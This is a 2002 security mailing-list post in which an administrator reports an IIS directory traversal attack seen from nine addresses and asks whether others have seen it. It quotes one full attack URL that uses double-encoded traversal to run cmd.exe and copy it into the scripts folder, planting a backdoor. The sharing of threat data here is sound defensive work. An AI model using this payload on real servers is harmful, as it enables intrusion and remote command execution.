[Dshield] New IIS directory traversal worm, or just a tool sig?

James C Slora Jr Jim.Slora at phra.com
Mon Nov 4 18:49:40 GMT 2002


Since Friday, I have seen this from nine different addresses. IIS directory
traversal attack is on the local system - not an HTTP CONNECT. The hostname
is being specified as "ww.tk.gov" (not a real public host), but this is just
window dressing on the attack.

http://ww.tk.gov/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\win
nt\system32\cmd.exe+c:\inetpub\scripts\script.exe

Anyone else seen this?




More information about the list mailing list